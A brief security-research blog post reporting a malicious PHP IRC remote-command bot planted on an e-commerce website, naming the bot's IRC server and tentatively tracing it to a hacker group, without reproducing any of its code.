E-commerce site hosts PHP IRC Bot

Here is an e-commerce website selling various items and taking payments online.

A malicious PHP script has been planted in the images folder, under an obscure name…

This is a IRC Bot that allows you to execute commands remotely.

Bots in themselves are not necesarily bad, there are in fact some legitimate uses. However, I highly doubt this one is ;-)

In the source code, you can see the name: “irc.onetcr3.com”.  Onetcr3 is a group of hackers heavily involved in writing malicious bots, including exploit code for known (and maybe unknown) vulnerabilities.

They are credited for making:

a Perl IRC Bot with vBulletin DoS Exploit.

a remote shell:

WordPress vulnerabilities:

 

There are some things that may indicate some of the guys from this group are Indonesian:

The WordPress exploit archives page shows this at the bottom:

Then there is is blog (translated from Indonesian) where what looks like an Indonesian hacker is thanking his peers:

Last but not least, someone posted on a freelancing site:

I guess one could infiltrate their IRC channel to learn more but that’s for another day ;-)

Jerome Segura